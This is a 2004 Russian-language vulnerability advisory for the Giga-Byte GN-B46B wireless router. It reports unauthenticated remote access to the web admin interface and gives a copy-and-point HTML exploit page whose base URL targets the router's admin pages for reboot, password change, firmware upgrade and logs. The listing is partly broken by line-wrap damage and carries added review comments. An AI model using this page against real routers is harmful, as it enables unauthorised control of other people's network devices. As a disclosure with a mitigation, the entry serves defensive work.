| Дата публикации: | 26.02.2004 |
| Всего просмотров: | 3044 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Giga-Byte Technology Router Model GN-B46B; Firmware Version 1.003.00
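Описание: Уязвимость обнаружена в широкополосном беспроводном маршрутизаторе GN-B46B от Giga-Byte Technology. Удалённый пользователь может получить доступ к устройству; судя по приведённому ниже примеру, речь идёт о страницах веб-интерфейса администрирования, однако причина уязвимости в описании не указана. Пример/Эксплоит: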
Just copy this to a ".html" file and replace <host> with the target's IP.
------------------------------------ Cut
Here --------------------------------------
<html>htdocs
<head>
<!-- Cache-control hints only: both META tags ask the browser not to cache this page. -->
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="expires" CONTENT="0">
<!-- "CURSOR: hand" is a legacy Internet Explorer cursor value. -->
<STYLE> #foldheader {CURSOR: hand}</STYLE>
<!--
  <host> is the advisory's placeholder for the device address, not a literal value.
  BASE makes every relative and root-relative URL in this document (the images, the
  /htdocs/*.htm pages, cgi-bin/SetData.cgi) resolve against that address instead of
  the location this file was opened from.
-->
<base href="http://<host>">
<script language="javascript">
<!--
// Index into document.all of the submenu that is currently expanded; -1 means none.
var lastIndex=-1;
// Click handler for the folding menu: expands the submenu that follows the clicked
// header cell (or its icon) and collapses whichever submenu was expanded before.
// Relies on the global `event` object, srcElement, sourceIndex and document.all,
// which are legacy Internet Explorer DOM features.
// NOTE(review): no closing brace for change() appears in this listing (the brace
// count is one short), so the script does not parse as shown; presumably the brace
// was lost when the page was extracted.
function change(){
// Click on a header cell: in the markup the cell is followed by its icon and then by
// the submenu table, so the submenu sits two positions further on in document.all.
if (event.srcElement.id=="foldheader") {
var srcIndex = event.srcElement.sourceIndex
var nested = document.all[srcIndex+2]
if (nested.style.display=="none") {
// Expand the clicked submenu, then hide the one recorded in lastIndex (if any).
nested.style.display=''
if (lastIndex>=0)
{
nested = document.all[lastIndex]
nested.style.display="none"
}
lastIndex=srcIndex+2;
}
else {
// Submenu was already visible: collapse it and record that nothing is expanded.
lastIndex=-1;
nested.style.display="none"
}
}
// Click on the header icon: same logic, but the submenu is the very next element.
if (event.srcElement.id=="foldimage") {
var srcIndex = event.srcElement.sourceIndex
var nested = document.all[srcIndex+1]
if (nested.style.display=="none") {
nested.style.display=''
if (lastIndex>=0)
{
nested = document.all[lastIndex]
nested.style.display="none"
}
lastIndex=srcIndex+1;
}
else {
lastIndex=-1;
nested.style.display="none"
}
}
// Installs change as the click handler for the whole document.
window.self.document.onclick=change
// Creates Image objects for the normal ("off") and hover ("on") state of the three
// top buttons. The variables are assigned without `var`, so they become globals named
// image1off/image1on ... image3off/image3on, which imgOn and imgOff look up by name.
// The paths are relative, so with the BASE element in this page's head the browser
// requests them from the address given there as soon as the script runs.
if(document.images){
image1off=new Image
image1off.src="../picture/button_setup.gif"
image1on=new Image
image1on.src="../picture/button_setup_over.gif"
image2off=new Image
image2off.src="../picture/button_status.gif"
image2on=new Image
image2on.src="../picture/button_status_over.gif"
image3off=new Image
image3off.src="../picture/button_logout.gif"
image3on=new Image
image3on.src="../picture/button_logout_over.gif"
}
// Switches the <img> whose NAME is imgName to its hover picture.
// The inline onMouseover handlers in this page call it with 'image1', 'image2' and 'image3'.
// NOTE(review): eval() is used only to read the global <imgName>on.src; a plain
// property lookup would do the same without evaluating a constructed string. Every
// caller visible in this page passes a fixed literal.
// NOTE(review): the function's closing brace is missing from this listing.
function imgOn(imgName){
if(document.images){
document[imgName].src=eval(imgName+"on.src")
}
// Switches the <img> whose NAME is imgName back to its normal picture.
// The inline onMouseout handlers in this page call it with 'image1', 'image2' and 'image3'.
// NOTE(review): eval() is used only to read the global <imgName>off.src; a plain
// property lookup would do the same without evaluating a constructed string. Every
// caller visible in this page passes a fixed literal.
// NOTE(review): the function's closing brace is missing from this listing.
function imgOff(imgName){
if(document.images){
document[imgName].src=eval(imgName+"off.src")
}
// Rewrites the href of the clicked link (item) so that it points at the log view of
// the CGI: SetData.cgi?LogMenu<which_log>+<seconds>+<offset>, where <seconds> is the
// client's current time in whole seconds (getTime() is in milliseconds) and <offset>
// is the client's getTimezoneOffset() value. '\+' is simply the character '+'.
// dd, time and offset are assigned without `var`, so they become globals.
// NOTE(review): the braces around the function body are missing from this listing,
// so it does not parse as shown.
function MoveOn(which_log, item)
dd = new Date();
time = dd.getTime();
offset = dd.getTimezoneOffset();
item.href = '../cgi-bin/SetData.cgi?LogMenu' + which_log + '\+' +
Math.round(time/1000) + '\+' + offset;
//-->
</script>
<title>English</title>
<style type="text/css">
/* Presentation rules for the menu page. They contain no url() references, so they
   do not cause any request of their own. */
body{font-family: Arial,verdana,Helvetica; font-size: 10pt; line-height:
18px;background:#ffffff;}
/* Background colour helpers. */
.blueBg {background:#79A7EF;}
.blackBg {background:#000000;}
.grayBg {background:#EEEEEE;}
.lightBlueBg
{background:#9FBEEE;font-size:10pt;color:#000000;font-weight:bold;}
.lightBlackBg
{background:#000000;font-size:10pt;color:#FFFFFF;font-weight:bold;}
.whiteBg {background:#ffffff;}
/* Text colour helpers. */
.redText {color:#FF9000;}
.tagText {color:#FF9000;font-weight:bold;background:#ffffff;}
.blueText {color: rgb(0,0,0);}
.orangeText {color:#FF9000;font-weight:bold;}
/* Heading and title styles. */
.heading{color:#000000;font-size:10pt;font-weight:bold;background:#ECF2F4;}
.heading1{color:#3333CC;font-size:10pt;background:#Eeeeee;}
.heading2{color:#3333CC;font-size:10pt;font-weight:bold;background:#ECF2F4;}
.headingLink{font-size:10pt;font-weight:bold;color:#ffffff;}
.title{color:#ffffff;font-size:20pt;font-weight:bold;background:#9FBEEE;}
.titleSub{color:#3333CC;font-size:15pt;font-weight:bold;background:#ffffff;}
/* NOTE(review): the .titleSub1 rule has no closing brace in this listing, so the
   .buttonText rule that follows is probably not parsed as a separate rule. */
.titleSub1{color:#000000;font-size:13pt;font-weight:bold;background:#ffffff;
.buttonText{background-color:
rgb(255,144,0);color:#ffffff;font-weight:bold;}
/* Link states. "cursor: hand" is a legacy Internet Explorer value and "bold" is not
   a valid font-style value. */
A:link {color:#FFFFFF; font-style: normal; cursor:
hand;text-decoration:none;}
A:visited {color:rgb(255,255,255); font-style:
normal;text-decoration:none;}
A:active {color:#9FBEEE; font-style: normal;text-decoration:none;}
A:hover {color:#9FBEEE; font-style:bold;text-decoration:underline;}
</style>
</head>
<BODY style="background-color: #000000">
<center>
<table cellpadding=0 cellspacing=0 border=0 width=180 class="blackBg">
<tr>
<td height="25" colspan="3"><img src="../picture/spacer.gif"
width="1"
height="1"></td>
</tr>
<!--
  "Setup" button: root-relative link to /htdocs/BasicLANSetup.htm, opened in the frame
  or window named "main"; the image is swapped on hover through imgOn/imgOff.
  NOTE(review): the ";" between the two event-handler attributes is stray markup.
-->
<tr>
<td colspan="3"><a href="/htdocs/BasicLANSetup.htm" target=main
onMouseover="imgOn('image1')"; onMouseout="imgOff('image1')">
<img src="../picture/button_setup.gif" border="0" name="image1"
width="184" height="23"></a></td>
</tr>
<!--
<tr>
<td colspan="3"><a href="/htdocs/status.htm" target=main
onMouseover="imgOn('image2')"; onMouseout="imgOff('image2')">
<img src="../picture/button_status.gif" border="0" name="image2"
width="184" height="31"></a></td>
</tr>
-->
<!--
  "Status" button. The anchor carries two href attributes; HTML parsers keep the first
  and ignore the duplicate, so the link goes to ../cgi-bin/SetData.cgi?ShowStatus and
  the second value (status.htm) has no effect.
  NOTE(review): the ";" between the two event-handler attributes is stray markup.
-->
<tr>
<td colspan="3"><a href="../cgi-bin/SetData.cgi?ShowStatus"
href="status.htm" target=main onMouseover="imgOn('image2')";
onMouseout="imgOff('image2')">
<img src="../picture/button_status.gif" border="0" name="image2"
width="184" height="31"></a></td>
</tr>
<!--
  "Logout" button: root-relative link to /htdocs/Logout.htm, opened in the top-level
  window (target=_top) rather than in the "main" frame used by the other links.
  NOTE(review): the ";" between the two event-handler attributes is stray markup.
-->
<tr>
<td colspan="3"><a href="/htdocs/Logout.htm" target=_top
onMouseover="imgOn('image3')"; onMouseout="imgOff('image3')">
<img src="../picture/button_logout.gif" border="0" name="image3"
width="184" height="29"></a></td>
</tr>
<tr>
<td colspan="3" height="8"><img src="../picture/spacer.gif"
width="1"
height="1"></td>
</tr>
<tr>
<td colspan="3">
<img src="../picture/button_advancedSetup.gif" border="0" width="174"
height="34"></td>
</tr>
<!--
  "Advanced Setup" menu row. Each folding header cell (id="foldheader") is followed by
  an icon (id="foldimage") and a nested table of links, which is the layout the change()
  click handler in this page depends on. Sub-links use bare relative names such as
  NetworkSetup3.htm, the direct links use root-relative /htdocs/ paths; with the BASE
  element in the head of this page all of them resolve against the device address.
  NOTE(review): the ids foldheader and foldimage are reused on several elements, and
  several tags and attributes are split across lines (for example "<" and "/td>",
  "h" and "eight", "&nb" and "sp;"). The breaks look like an extraction or line-wrap
  artifact; confirm against the original advisory before relying on this markup.
-->
<tr>
<td background="../picture/border_left.gif">
<img src="../picture/border_left.gif" width="15" height="19"><
/td>
<td>
<table cellpadding="0" cellspacing="0" border="0" width="160"
class="lightBlackBg">
<tr>
<td height="5"><img src="../picture/spacer.gif" width="1" h
eight="1"></td>
</tr>
<!-- Folding group: network configuration pages. -->
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Network Configur
ation
<table id="network" border="0">
<tr class="headingLink"><td> <a
href="NetworkSetup3.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> LAN Configuration</a></td></tr>
<tr class="headingLink"><td> <a
href="NetworkSetup2.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> WAN Configuration</a></td></tr>
<tr class="headingLink"><td> <a
href="NetworkSetup1.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> WAN Setting</a></td></tr>
</table>
</td>
</tr>
<!-- Folding group: wireless settings and MAC access control. -->
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Wireless Configu
ration
<table id="wireless" border="0">
<tr class="headingLink"><td> <a
href="WirelessSetup2B.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> 802.11b</a></td></tr>
<tr class="headingLink"><td> <a
href="MACcontrol11b.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> MAC Access Control</a></td></tr>
</table>
</td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/StaticRouting.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Static Routing Table</a></td>
</tr>
<!-- Folding group: virtual server pages. -->
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Virtual Server
<table id="virtual" border="0">
<tr class="headingLink"><td> <a
href="VirtualServer1.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> DMZ</a></td></tr>
<tr class="headingLink"><td> <a
href="VirtualServer2.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> PPPoE/DHCP/Static</a></td></tr>
<tr class="headingLink"><td> <a
href="VirtualServer3.htm" target=main ><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> PPPoE Unnumber</a></td></tr>
</table>
</td>
</tr>
<!-- Folding group: firewall pages. -->
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Firewall Rule
<table id="firewall" border="0">
<tr class="headingLink"><td> <a
href="Firewall1.htm" target=main ><img src="../picture/icon_list_sub.gif"
border="0" align="absmiddle" width="7"
height="7"> Security</a></td></tr>
<tr class="headingLink"><td> <a
href="Firewall3.htm" target=main ><img src="../picture/icon_list_sub.gif"
border="0" align="absmiddle" width="7" height="7">&nb
sp;VPN Pass
Through</a></td></tr>
<tr class="headingLink"><td> <a
href="Firewall2.htm" target=main ><img src="../picture/icon_list_sub.gif"
border="0" align="absmiddle" width="7" height="7">&nb
sp;Static
Rule</a></td></tr>
</table>
</td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/DNSReplay.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> DNS Replay</a></td>
</tr>
<tr>
<td height="7"><img src="../picture/spacer.gif" width="1" h
eight="1"></td>
</tr>
</table>
</td>
<td background="../picture/border_right.gif">
<img src="../picture/border_right.gif" width="19" height="19"><
/td>
</tr>
<tr>
<td colspan="3">
<img src="../picture/button_management.gif" border="0" width="174"
height="31"></td>
</tr>
<!--
  "Management" menu row. The link targets are the device's administration pages
  (PPP monitor, reboot, initialization, password change, WAN MAC change, firmware
  upgrade, backup and restore, logs, save, ping). The advisory text only says that a
  remote user can gain access to the device; presumably these pages are served without
  an authenticated session. TODO confirm against the original advisory.
  For defenders: requests for /htdocs/*.htm or /cgi-bin/SetData.cgi on the router from
  hosts that are not expected to administer it are the activity to look for.
  NOTE(review): several tags and attributes are split across lines ("<" and "/td>",
  "h" and "eight", "h" and "ref"); this looks like an extraction or line-wrap artifact.
-->
<tr>
<td background="../picture/border_left.gif">
<img src="../picture/border_left.gif" width="15" height="19"><
/td>
<td>
<table cellpadding="0" cellspacing="0" border="0" width="160"
class="lightBlackBg">
<tr>
<td height="5"><img src="../picture/spacer.gif" width="1" h
eight="1"></td>
</tr>
<tr>
<td valign="top"><a href="../cgi-bin/SetData.cgi?ShowPPPMonitor"
target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> PPP Monitor</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/Reboot.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Reboot</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/Initialization.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Initialization</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/ChangePassword.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Change Password</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/ChangeMAC.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Change WAN MAC</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/UpgradeFirmware.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Upgrade Firmware</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/BackUpRestore.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> BackUp/Restore</a></td>
</tr>
<!--
  Folding group: log views. Each link starts with href="#"; the onclick handler calls
  MoveOn, which replaces the href with the SetData.cgi LogMenu URL for that log.
-->
<tr>
<td valign="top" id="foldheader">
<img src="../picture/icon_list.gif" align="absmiddle" id="foldimage"
border="0" width="7" height="7"> Log Information
<table id="log" border="0">
<tr class="headingLink"><td> <a h
ref="#"
target=main onclick="MoveOn('firelog', this)"><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> Firewall Log</a></td></tr>
<tr class="headingLink"><td> <a h
ref="#"
target=main onclick="MoveOn('connlog', this)"><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> WAN Connection</a></td></tr>
<tr class="headingLink"><td> <a h
ref="#"
target=main onclick="MoveOn('upnplog', this)"><img
src="../picture/icon_list_sub.gif" border="0" align="absmiddle" width="
7"
height="7"> UPnP Log</a></td></tr>
</table>
</td>
</tr>
<!--
<tr>
<td valign="top"><a href="../cgi-bin/SetData.cgi?LogMenufirelog+0+0"
target=main onclick="MoveOn('firelog')">
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Log Information</a></td>
</tr>
-->
<tr>
<td valign="top"><a href="/htdocs/Save.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Save Maintenance</a></td>
</tr>
<tr>
<td valign="top"><a href="../others/Help.English.htm" target="_b
lank">
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Help</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/Ping.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> Ping</a></td>
</tr>
<tr>
<td valign="top"><a href="/htdocs/About.htm" target=main>
<img src="../picture/icon_list.gif" align="absmiddle" border="0"
width="7" height="7"> About</a></td>
</tr>
<tr>
<td height="5"><img src="../picture/spacer.gif" width="1" h
eight="1"></td>
</tr>
</table>
</td>
<td background="../picture/border_right.gif">
<img src="../picture/border_right.gif" width="19" height="19"><
/td>
</tr>
<tr>
<!--<td colspan="3"><img src="../picture/banner_bottom.gif" width="
184"
height="38"></td>-->
</tr>
<tr>
<td colspan="3" height="20"><img src="../picture/spacer.gif"
width="1"
height="1"></td>
</tr>
</table>
</center>
</body>
</html>
<script language="javascript">
// Collapses the five folding submenus once the page has loaded. The element ids
// (network, wireless, virtual, firewall, log) are used as if they were global
// variables, which is legacy Internet Explorer behaviour.
// NOTE(review): there are no braces after the `if`, so as written only the first
// assignment depends on the Internet Explorer version check; the other four run
// unconditionally. The braces may have been lost when the page was extracted.
// NOTE(review): this script element sits after the closing </html> tag in the listing.
if(navigator.appName == "Microsoft Internet Explorer" &&
parseInt(navigator.appVersion) >= 4)
network.style.display = "none" ;
wireless.style.display = "none" ;
virtual.style.display = "none" ;
firewall.style.display = "none" ;
log.style.display = "none" ;
</script>
------------------------------------ Cut
Here --------------------------------------
#######################################################################
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."
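URL производителя: http://www.giga-byte.com/Communication/Products/Products_Wireless_GN-B46B.htm Решение: В настоящее время способов устранения обнаруженной уязвимости не существует. До выхода исправления имеет смысл разрешать доступ к веб-интерфейсу управления устройства только с доверенных узлов. |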
|
| Ссылки: | Gigabyte Broadband Router - Multiple Vulnerabilities |